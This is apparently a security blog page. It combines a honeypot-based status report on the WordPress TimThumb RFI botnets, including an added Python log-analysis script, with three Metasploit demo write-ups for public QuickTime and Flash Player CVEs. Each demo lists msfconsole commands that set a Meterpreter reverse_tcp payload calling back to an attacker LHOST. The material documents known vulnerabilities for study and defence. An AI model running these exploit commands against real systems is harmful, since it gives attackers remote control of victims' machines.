WordPress TimThumb Botnets Spread Status – second edition

Since Mark Maunder discovered the WordPress TimThumb vulnerability in August 2011, it has been used as a botnet recruitment vector and has spread across multiple botnets. Hundreds of WordPress blogs have been hacked, allowing potential infection of the blogs' visitors, spam and phishing campaigns, DDoS, the hacking of other web sites (such as the About.us domain name registrar), and so on. Some of these infected WordPress installations were controlled by well-known C&C servers used and shared by black hats from around the world.

Six months after the discovery of the vulnerability I made a first status report on the WordPress TimThumb spread, with some nice visualizations and graphs representing the botnet activities.

We are now almost one year after the discovery of the vulnerability, and a second status report on the WordPress TimThumb botnets can be made. Are the botnets still active? Are fewer WordPress blogs vulnerable? Is the peak of the spread over? We will try to answer these questions through an analysis of all WordPress TimThumb exploitation attempts against our Honey Net. The data collected through our Honey Net represent only a small part of the real activity of the WordPress TimThumb botnets, but they can serve as a basis for extrapolating the real activities.

List of all detected infected domains

The following table lists all detected infected domains that were called during WordPress TimThumb RFI attacks, with each domain's associated IP address, the country where the blog was hosted, the number of distinct source IPs that called the domain during the RFI attack, and the live time of the domain name.

We have a total of 473 affected domains, compared to 202 six months before. This number demonstrates that 11 months after the vulnerability discovery the botnet is still active and that the number of infected domains is still significant. “blogger.com.dollhousedelights.com“, hosted in Taiwan (the IP has moved from Vietnam to Taiwan), was the affected domain called by the most distinct source IPs (265), followed by “picasa.com.xpl.be” with 167 distinct source IPs, and in third place “blogger.com.midislandrental.com” with 110 distinct source IPs.

“picasa.com.xpl.be” has a live time of 238 days, followed by “upload.wikimedia.org.penguinet.co.ke” with a live time of 218 days, “blogger.com.sabrosaserver.com” with 211 days, “wordpress.com.airatrip.com” with 186 days and “flickr.com.bpmohio.com” with 179 days.

29 domains have a live time above 100 days, and 86 domains have a live time between 30 and 100 days.

Infected blogs repartition by country

You can find in the following graphs (Chart1, Chart2) the geographical repartition of the infected blogs.

We have a total of 45 different countries for 473 affected domains. The United States is in first position with 57% (284) of all infected blogs, followed by Canada with 5.2% (26) and the United Kingdom with 4.4% (22). The US is still in first position (+155) for infected WordPress installations, and we can see that the infected countries are quite the same as six months ago.

Infected blogs repartition by country, by number of source IPs

You can find in the following graphs (Chart3, Chart4) the geographical repartition of the infected blogs by number of distinct source IPs that called the infected blogs.

We have a total of 3340 distinct source IPs for 473 affected domains and 45 different hosting countries. The United States is in first position with 44.3% (1480), followed by Vietnam with 8.4% (279), Chile with 4.3% (143), Romania with 4.3% (142) and Australia with 3.6% (119). The US is still in first position (+639) for infected WordPress installations and Vietnam in second position, but the number of Vietnamese source IPs has drastically decreased in growth compared to six months ago (only +36).
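As an added example that is not part of the original post, the following Python script shows how figures like those above (distinct source IPs per called domain, live time of the domain, and the share of source IPs per country) can be derived from honeypot access logs. It runs on a few constructed log lines embedded in the script; the allowed-host list, the .test domains and the IP-to-country table are assumptions standing in for the real TimThumb allow-list and a GeoIP database. Note that the called domains in the table above all begin with a trusted image host name (blogger.com, picasa.com, upload.wikimedia.org, ...), which is how the original TimThumb allow-list check, a substring match on the host, was bypassed; the script's host_is_trusted() shows the suffix-based check that does not have this problem and is used here to separate genuine remote images from RFI attempts.

```python
"""Added example (not code from the original post): parse constructed
honeypot access-log lines for TimThumb remote-file-inclusion attempts and
build the per-domain figures the post reports (distinct source IPs, live
time in days) plus a per-country share of source IPs."""
import re
from collections import defaultdict
from datetime import datetime
from urllib.parse import parse_qs, urlsplit

# Subset of the remote image hosts TimThumb 1.x trusted (assumption: the
# allow-list shipped with a given theme may differ).
ALLOWED_HOSTS = ("blogger.com", "picasa.com", "flickr.com", "wordpress.com",
                 "upload.wikimedia.org", "img.youtube.com")

# Combined log format prefix: client IP, identd, user, [timestamp], "request".
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<uri>\S+) [^"]*"')
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# Constructed sample log (documentation IP ranges, .test domains); the attacker
# domains mimic the naming pattern seen in the post, e.g. blogger.com.<other>.
SAMPLE_LOG = """\
203.0.113.5 - - [15/Sep/2011:10:02:11 +0000] "GET /wp-content/themes/demo/timthumb.php?src=http://blogger.com.infected-a.test/x.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.7 - - [20/Oct/2011:03:44:09 +0000] "GET /wp-content/themes/demo/timthumb.php?src=http://blogger.com.infected-a.test/x.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.7 - - [11/May/2012:18:20:00 +0000] "GET /wp-content/themes/demo/timthumb.php?src=http://blogger.com.infected-a.test/x.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.0.2.44 - - [01/Nov/2011:07:00:00 +0000] "GET /wp-content/themes/demo/timthumb.php?src=http://picasa.com.infected-b.test/y.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.0.2.44 - - [02/Nov/2011:07:00:00 +0000] "GET /wp-content/themes/demo/timthumb.php?src=http://img.blogger.com/real.jpg HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [03/Nov/2011:09:15:30 +0000] "GET /wp-content/themes/demo/timthumb.php?src=/wp-content/uploads/local.jpg HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [04/Nov/2011:09:15:30 +0000] "GET /index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""

# Constructed stand-in for a GeoIP lookup of the source IPs above.
SAMPLE_IP_COUNTRY = {"203.0.113.5": "US", "198.51.100.7": "VN", "192.0.2.44": "US"}


def host_is_trusted(host):
    """Correct allow-list check: exact host or a real subdomain of an allowed host."""
    return any(host == a or host.endswith("." + a) for a in ALLOWED_HOSTS)


def embeds_trusted_name(host):
    """Lookalike check: a trusted host name used as the leading labels of another domain."""
    return any(host.startswith(a + ".") for a in ALLOWED_HOSTS)


def parse_rfi_attempt(line):
    """Return (source_ip, timestamp, remote_host) for a timthumb.php request
    whose src= points at an untrusted remote host, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("uri"))
    if not parts.path.lower().endswith("timthumb.php"):
        return None
    src = parse_qs(parts.query).get("src", [""])[0]
    if not src.lower().startswith(("http://", "https://")):
        return None  # local image path, not a remote inclusion
    host = (urlsplit(src).hostname or "").lower()
    if host_is_trusted(host):
        return None
    return m.group("ip"), datetime.strptime(m.group("ts"), TS_FMT), host


def summarize(lines):
    """Per called domain: distinct source IPs, first/last seen, live time in
    days, and whether the name embeds a trusted host name."""
    stats = {}
    for line in lines:
        hit = parse_rfi_attempt(line)
        if hit is None:
            continue
        ip, ts, host = hit
        d = stats.setdefault(host, {"ips": set(), "first": ts, "last": ts,
                                    "lookalike": embeds_trusted_name(host)})
        d["ips"].add(ip)
        d["first"] = min(d["first"], ts)
        d["last"] = max(d["last"], ts)
    for d in stats.values():
        d["distinct_ips"] = len(d["ips"])
        d["live_days"] = (d["last"] - d["first"]).days
    return stats


def source_country_share(lines, ip_country):
    """Count and percentage of distinct source IPs per country."""
    ips = {hit[0] for hit in map(parse_rfi_attempt, lines) if hit}
    if not ips:
        return {}
    counts = defaultdict(int)
    for ip in ips:
        counts[ip_country.get(ip, "unknown")] += 1
    return {c: (n, round(100.0 * n / len(ips), 1)) for c, n in counts.items()}


def sample_lines():
    return SAMPLE_LOG.splitlines()


if __name__ == "__main__":
    for host, d in sorted(summarize(sample_lines()).items(),
                          key=lambda kv: -kv[1]["distinct_ips"]):
        print(f"{host:32} ips={d['distinct_ips']:3} live_days={d['live_days']:3} "
              f"lookalike={d['lookalike']}")
    print(source_country_share(sample_lines(), SAMPLE_IP_COUNTRY))
```

On real honeypot data the same aggregation runs over the full access log, and the country column would come from a GeoIP database rather than the constructed table; the request for img.blogger.com and the local image path in the sample are deliberately included to show that the suffix check keeps legitimate TimThumb use out of the statistics.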

Timeline by day of infected blogs calls and source IPs

You can find in the following timeline (Chart5) a representation by day of the number of infected blog calls and source IPs.

From January 2012 to April 2012 the botnet spread constantly decreased in terms of number of affected hosts and source IPs, but in April 2012 the botnet suddenly increased its activity. November 2011 was the most active month in number of source IPs.

Geographic timeline by day of all source IPs

In this geographic time map we load data from a Google Spreadsheet (published here). These data come from our HoneyNet and represent the geographic WordPress TimThumb botnet activities from 15-09-2011 to 01-07-2012.

Conclusion

One year after the vulnerability discovery, the WordPress TimThumb botnets are still infecting new blogs, although the peak of the spread has been over since November 2011. My personal opinion is that we will still continue to hear about these botnets during the second part of 2012.

CVE-2012-0663 Apple QuickTime TeXML BoF Vulnerability Metasploit Demo

Timeline :

Vulnerability discovered by Alexander Gavrun
Vulnerability reported to ZDI by Alexander Gavrun
Vulnerability reported by ZDI to the vendor on 2011-10-21
Coordinated public release of the vulnerability on 2012-06-12
Metasploit PoC provided on 2012-06-27

PoC provided by :

Alexander Gavrun
sinn3r
juan vazquez

Reference(s) :

CVE-2012-0663
OSVDB-81934
BID-53571
ZDI-12-107
HT1222

Affected version(s) :

QuickTime version 7.7.1 and previous

Tested on Windows XP Pro SP3 with :

QuickTime 7.7.1

Description :

This module exploits a vulnerability found in Apple QuickTime. When handling a TeXML file, it is possible to trigger a stack-based buffer overflow, and then gain arbitrary code execution under the context of the user. This is due to the QuickTime3GPP.gtx component not handling certain Style subfields properly, storing user-supplied data on the stack, which results in the overflow.

Commands :

use exploit/windows/fileformat/apple_quicktime_texml
set TARGET 0
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit -j

sysinfo
getuid

CVE-2011-2110 / APSB11-18 Adobe Flash Player Vulnerability Metasploit Demo

Timeline :

Vulnerability discovered being exploited in the wild
Public release of the vulnerability by the vendor on 2011-06-14
Details of the vulnerability provided on 2011-10-09
Metasploit PoC provided on 2012-06-19

PoC provided by :

mr_me
Unknown

Reference(s) :

CVE-2011-2110
OSVDB-73007
APSB11-18
BID-48268

Affected version(s) :

Adobe Flash Player 10.3.181.23 and earlier versions for Windows, Macintosh, Linux and Solaris operating systems
Adobe Flash Player 10.3.185.23 and earlier versions for Android

Tested on Windows XP Pro SP3 with :

Internet Explorer 8
Adobe Flash Player 10.3.181.23

Description :

This module exploits a vulnerability in Adobe Flash Player versions 10.3.181.23 and earlier. This issue is caused by a failure in the ActionScript3 AVM2 verification logic. This results in unsafe JIT (Just-In-Time) code being executed. This is the same vulnerability that was used for attacks against Korean-based organizations. Specifically, this issue occurs when indexing an array using an arbitrary value; memory can then be referenced and later executed. Taking advantage of this issue does not rely on heap spraying, as the vulnerability can also be used for information leakage. Currently this exploit works for IE6, IE7, IE8, Firefox 10.2 and likely several other browsers under multiple Windows platforms. This exploit bypasses ASLR/DEP and is very reliable.

Commands :

use exploit/windows/browser/adobe_flashplayer_arrayindexing
set SRVHOST 192.168.178.100
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

sysinfo
getuid

CVE-2012-0779 / APSB12-09 Adobe Flash Player Vulnerability Metasploit Demo

Timeline :

Vulnerability discovered being exploited in the wild
Public release of the vulnerability by the vendor on 2012-05-04
Details of the vulnerability provided on 2012-05-06
Metasploit PoC provided on 2012-06-22

PoC provided by :

sinn3r
juan vazquez

Reference(s) :

CVE-2012-0779
OSVDB-81656
APSB12-09
BID-53395

Affected version(s) :

Adobe Flash Player 11.2.202.233 and earlier versions for Windows, Macintosh and Linux operating systems
Adobe Flash Player 11.1.115.7 and earlier versions for Android 4.x, and Adobe Flash Player 11.1.111.8 and earlier versions for Android 3.x and 2.x

Tested on Windows XP Pro SP3 with :

Internet Explorer 6
Adobe Flash Player 11.2.202.228

Description :

This module exploits a vulnerability found in Adobe Flash Player. By supplying a corrupt AMF0 “_error” response, it is possible to gain arbitrary remote code execution under the context of the user. This vulnerability has been exploited in the wild as part of the “World Uyghur Congress Invitation.doc” e-mail attack. According to the advisory, 10.3.183.19 and 11.x before 11.2.202.235 are affected.

Commands :

use exploit/windows/browser/adobe_flash_rtmp
set RTMPHOST 192.168.178.100
set SRVHOST 192.168.178.100
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

sysinfo
getuid